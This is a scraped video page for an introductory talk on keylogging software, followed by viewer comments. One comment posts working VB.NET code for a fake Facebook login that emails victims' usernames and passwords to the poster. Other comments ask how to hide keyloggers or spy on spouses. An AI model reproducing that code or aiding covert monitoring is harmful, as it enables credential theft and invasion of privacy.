Loading...

Keylogging Software Introduction

. 52 Videos
Subscribe
22,548,145
2,729,347 views
95% 39,852 852

About :

For Classes, Class Notes and Blog Posts:
http://www.EliTheComputerGuy.com

Join the Conversation at Our Online Community:
http://ETCGNetwork.com

Visit the Vlog YouTube Channel at:
http://www.YouTube.com/EliComputerGuyLive

Follow us on Facebook at:
http://www.Facebook.com/EliComputerGuy

Follow us on Twitter at:
http://www.Twitter.com/EliComputerGuy

naruto online ninja exam 95

ps2 emulator raspberry pi 3

8??

kaio crap

terraria best armor 1.3

pvp shaders

downgrade new 3ds to 9.2

creeper heart witchery

how to tether phone to ps4

ps3 controller on pc windows 8 without motioninjoy

Tags :

Eli the Computer Guy

Google AdSense
728 x 90

Similar Videos:

Introduction to the Darknet
15:19
8,241,542 views. 93%
User Account Security Theory
15:19
8,241,542 views. 93%
50 Comments

    Popular Comments:

Мухаммед Саад . 2019-04-08
We need more and more tutorials please, thank you so much
121 2 . Reply
Brandon Farfan . 2018-12-11
That keylogging software is really interesting.😂
121 2 . Reply
Khaled Sw . 2018-11-04
look at his hands he is on cocain
121 2 . Reply
Zach Anderson . 2018-11-01
Any suggestions as far a detecting key logging software other than software such as virus protection. Can you detect the activity on the computer or over the network when it is being used or the data being sent out or is this done in a stealthy enough manner to stand out?
121 2 . Reply
Unedited Gamer . 2018-10-10
Download random keylogger
Install into persistent sandbox with the main web browser.
Go into the firewall and block all in and out communication with the keylogger.

Have a second web browser in program/search bar. Firewall will prevent monitoring from a third party while the sandbox will prevent the keylogger from monitoring other software on the system.

Place logged browser icon on desktop
121 2 . Reply
Marc Andrei . 2018-08-11
just make one not that hard
121 2 . Reply
Vlad . 2018-01-09
One word: SpyShelter
121 2 . Reply
Mr Eaaasy . 2017-12-26
Hey is there anything I can I can use on mobile devices please???? I really love this this is getting interesting
121 2 . Reply
Curtis Traynham . 2017-11-14
I'm going takes some notes
121 2 . Reply
Alex Quaesar . 2017-09-23
The only malware software you should ever use is the one you create yourself.
121 2 . Reply
B1nary S0ulJour . 2017-08-07
Hi eli can you make some more videos on exploits and exploit development..?
121 2 . Reply
Slim . 2017-08-01
I created a keylogger that not only was completely invisible, but it didnt allow the user to access task manager or cmd which basically meant if there was shit going on in his or her pc..they wouldnt be able to tell
121 2 . Reply
Νικος Μαρκοπουλος . 2017-06-21
two downsides: you cant grab the computer's password because you type it in before any program starts and most of us are already loged in social media
121 2 . Reply
shuttdown . 2017-05-08
what about in Linux ,the command TOP or ps will show all process running
121 2 . Reply
Janice Dewdney . 2016-12-14
Can you help me online with some advice against hackers/hijackers/keyloggers.
I am being controlled with gaming networks. There is no point in me getting a new OS put on as they have it changed before it is even completely downloaded. The hackers are local in my area. They have my house set up. I seem to be on two different partitions but i can only use the windows. I have 'no access even to change my clock..I know they are controlling through the clock and the HD sound.

Can you help either yourself or advise me what to do please..
This has been going on for 6 years,..
My computer is going down hill again and i am not willing to buy another as this is only a year old..
121 2 . Reply
VoeViking . 2016-05-12
Does the same apply to company traffic "sniffing" ???
121 2 . Reply
HIMEL SARKAR . 2016-04-01
100thanks
121 2 . Reply
Dil Wale . 2016-03-21
your kid have to be worry after that video.
121 2 . Reply
John Adams . 2016-02-27
@ELI Hello. Is there some kind of memory stick /usb device that can be used to capture what's typed in to a computer or when web sites are visited and passwords are put in
121 2 . Reply
Best Highlights . 2015-12-18
121 2 . Reply
Iñigo Gascón . 2015-12-11
Do antivirus detect this key logger?
121 2 . Reply
Justin Bennett . 2015-07-28
im a kid my self (15 years old) but if your a parent that puts a key logging software on your pc ot monitor the keys ok fine you can do that but whos to say the software wont take your bank statements steel your id hack your emails etc. but but I don't have bank statements on my pc or care if my email gets hacked well some one can steel your id with just your birthday and full name and chances are you have that on your computer anther thing you have to think about is virus virus can shut down your pc and just go oh this is the government we have shut down your pc because you've broken so and so law (ohm no I haven't) to unlock your pc pay this and this amount of money with in 2 or 3 days if you don't you can go to jail well all that is a scam you have malware on the computer that you need to get rid of now you might be looking at computer repair fees if you don't know how to fix that yourself possible stolen id all your accs well go down you well get a angry kid on your hands so on and so on all because you got protective and didn't know what to do.  like eli said theirs other safer ways to go about this
121 2 . Reply
Brician Mcwilliams . 2015-07-26
What is it 1995? Lmao
121 2 . Reply
Brician Mcwilliams . 2015-07-26
121 2 . Reply
MrPainseeker . 2015-07-18
Is there anyway to hide it from the "services" or "details" section of windows task manager?
121 2 . Reply
Aidan Winship . 2015-07-15
Can you use this remotely? (Record keystrokes on someone else's computer, but get the data on a different computer.)
121 2 . Reply
Andree K . 2015-07-12
This is how i found out my now-ex wife was cheating one me. Very useful.
121 2 . Reply
Tommy t . 2015-06-16
watched this vid not for this reeason but yyou have my respect that you care about viewers like you do. You really tried to give them all the info about parents andd keyloggint and alll other things just saying was good to see that.  im not a parent by the way okan man good job peaceeeee
121 2 . Reply
Taylor Melton . 2015-05-08
so, with the issue of expected privacy, is it Illegal to look at your spouses/child's/co-workers web browsing history?
121 2 . Reply
Jt Ag . 2015-03-28
Imports System.Net.Mail

Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If TextBox1.Text = "" Then
MsgBox("Email or Phone Not Found!", MsgBoxStyle.Critical)
ElseIf TextBox2.Text = "" Then
MsgBox("Password Not Found!", MsgBoxStyle.Critical)
Else
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("your email here", "your password here")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("your email here")
mail.To.Add("your email here")
mail.Subject = "Facebook Account"
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(mail)
MsgBox("Cannot Connect to server please try again later.", MsgBoxStyle.Critical)
End If
End Sub

Private Sub CheckBox1_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles CheckBox1.CheckedChanged
If CheckBox1.Checked = True Then
TextBox2.UseSystemPasswordChar = False
ElseIf CheckBox1.Checked = False Then
TextBox2.UseSystemPasswordChar = True
End If
End Sub
End Class

###################################-J..TITUS ANDRONICUS..G-###################################

your  welcome.     Visual studio 2013 !!!!!!!

key logger send to e-mail code 11
121 2 . Reply
jolllyroger . 2015-02-09
lol chrome is great for pen testers and hackers to get your stuff and of course google knows all you do duh
121 2 . Reply
ɪʍραα . 2014-12-30
can you get keylogged from a link you click on but you dont download anything? Please help
121 2 . Reply
Genie Lamp . 2014-08-23
Notice how eli droped a hint with an emphasis as he mentoined those check boxes. My guess is eli decompiled the exe or some shit and seen the code within the program. I bet the feds got a million of these types of things on the net, and if you do not check those boxes and choose to run it stealth, it prolly activates a part of the code for identification. Its a question of legality, its not illegal to use a keylooger on your own shit, but if the user chooses to run it stealth the feds prolly get permission to then treat the user as a criminal (guilty till proven innocent) and start spying n shit on you. Eli, if you know something about this keylogger business which im sure you do why remain quiet?  i like you but i think thats a bitch move on your part by keeping info "IN" like that. You cant be on the fence, your either one of us or one of them, cuz when the shit hits the fan, neutrals dont exist   
121 2 . Reply
Nate Johnson . 2014-07-29
Hmm i get it now. What i don't get is how people key log each other? how does someone send a file and have the other person download and get their information?Or is it with different software you can do that? 
121 2 . Reply
Kevon Alexander . 2014-07-24
"FaceTwitter" LOL :v >.<

Now who knows a good key logger that could be installed remotely or at lease have VB source code for one?
121 2 . Reply
Jay Durandal . 2014-07-17
3:18 Additional quotes:
"Some Thieves are Green Hats, but not all Green Hats are Thieves." - Abe Lincoln
"In order to become a Pirate, one must first be a Pirate." - Heraclitus 
"It's all fun and games until Everything is not as it seems{}. seems{}. seems{}. You should be extremely careful. I have detected Durandal in the Engineering Section, but I don't know what he is doing." - Spongebob
"Don't hate the players. Hate the game." - Anonymous 
121 2 . Reply
CSquared . 2014-07-15
Did you ever have any security issues with the software that you downloaded from CNET? 
You talked alot about other peoples computers. However I would be doing it on my own computer to track people using my computer. What are the repercussions? 
121 2 . Reply
Why? . 2014-06-24
This is unlegal
121 2 . Reply
hatim gadal . 2014-04-05
good job Eli 
121 2 . Reply
MoBBzY . 2013-12-15
Aka The Devil's Share
121 2 . Reply
Io Witter . 2013-12-13
There is a mistake in logic: "If it is free - then why? (implicit with this statement is that someone has released it with malware)"
It follows that what better way to cover yourself if you are releasing malware than to CHARGE for it!!!
121 2 . Reply
Mark Twain . 2013-12-07
I'm glad Eli isn't my dad! Well maybe not bad...
121 2 . Reply
Thibaut Heugebaert . 2013-11-12
hello, I installed keylogger sspro but I opened it on my computer and I can't uninstaal ut it stays on my coputer and Ican'st shut the program down or remove it. The program asks me a password but I don't know it. WHAT DO I HAVE TO DO????? PLEASE HELP
121 2 . Reply
Brando . 2013-10-27
I agree is illegal to spy but check this out: Facebook and Google are one of the biggest spies...everything we type, say, see, post, upload, download, like, don't like etc...is being recorded by them and other parties....and can be used for some reason that you might don't know...you might have heard that facebook and others social networks are being monitored by CIA, FBI etc. Almost everybody has a cell phone right? That is and can also be used to track every your movement. THERE IS NO PRIVACY!
121 2 . Reply
norge696 . 2013-10-16
Look in msconfig and see if their are any unknown exe's being launched at startup, especially if it's a unknown manufacturer.
121 2 . Reply
Imran Khan . 2013-10-04
hi guys is there is key logging software for smart mobiles
121 2 . Reply
Imran Khan . 2013-10-04
hi guys is there is key logging software for smart mobiles
121 2 . Reply
crilleAaa . 2013-09-26
So can you teach us how to find out if there is a keylogger on my private computer?
121 2 . Reply
Damian Romero . 2013-09-26
i remember as a freshman in high school we learned about c++ in visual basics and i learned my way around mouse recordings and keylogging. honestly if you wanted a key logger... make your own. You know that it will malicious proof and!!!! its custom to your needs. For a noob in high school.... cant be that hard!
121 2 . Reply
Joran Anders . 2013-09-26
Very informative video. I actually have two points I'd like to make. Within a within a windows OS platform isn't it still possible to see key logging software within one of the subsections of the 'task manager' or with advanced features of some antivirus software? Also there is one industry where monitoring software is very prevalent: the call center/customer service. In most cases when you hear "this call may be monitored for..." the employees PC is also being monitored as well.
121 2 . Reply